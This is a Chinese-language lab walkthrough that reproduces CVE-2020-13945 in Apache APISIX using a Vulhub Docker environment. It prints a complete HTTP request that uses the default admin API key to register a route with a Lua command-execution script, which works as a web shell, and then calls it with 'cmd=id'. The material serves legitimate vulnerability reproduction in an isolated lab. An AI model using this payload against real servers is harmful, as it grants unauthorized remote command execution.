简介
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
Github地址:https://github.com/vulhub/vulhub
1
2
3
4
5
6
|
git clone https://github.com/vulhub/vulhub.git
cd vulhub/xxx
docker-compose up
|
漏洞环境
靶场:192.168.199.132
1
2
| cd vulhub/apisix/CVE-2020-13945
docker-compose up
|
访问地址:http://192.168.199.132:9080,即可查看到默认的404页面。
漏洞复现
利用默认Token增加一个恶意的router,其中包含恶意LUA脚本。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| POST /apisix/admin/routes HTTP/1.1
Host: 192.168.199.132:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 357
{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}
|
访问http://192.168.199.132:9080/attack?cmd=id
